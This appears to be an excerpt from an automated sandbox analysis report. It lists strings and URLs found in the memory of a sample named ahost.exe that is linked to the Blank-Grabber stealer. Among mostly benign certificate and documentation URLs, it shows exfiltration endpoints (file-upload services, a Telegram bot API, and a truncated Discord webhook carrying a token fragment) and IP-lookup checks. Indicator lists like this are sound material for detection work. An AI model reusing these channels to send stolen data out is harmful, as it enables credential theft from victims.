              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
              Source: powershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B9308000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: ahost.exe, 00000002.00000003.1402625543.000002162BDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417086110.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1414363268.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1412497532.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: ahost.exe, 00000002.00000002.1869617647.000002162BC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1401051914.000002162B9DF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: svchost.exe, 00000015.00000003.1476407714.0000021787633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000015.00000003.1476407714.0000021787600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
              Source: ahost.exe, 00000002.00000003.1414867373.000002162C0BE000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1413977247.000002162C414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
              Source: ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
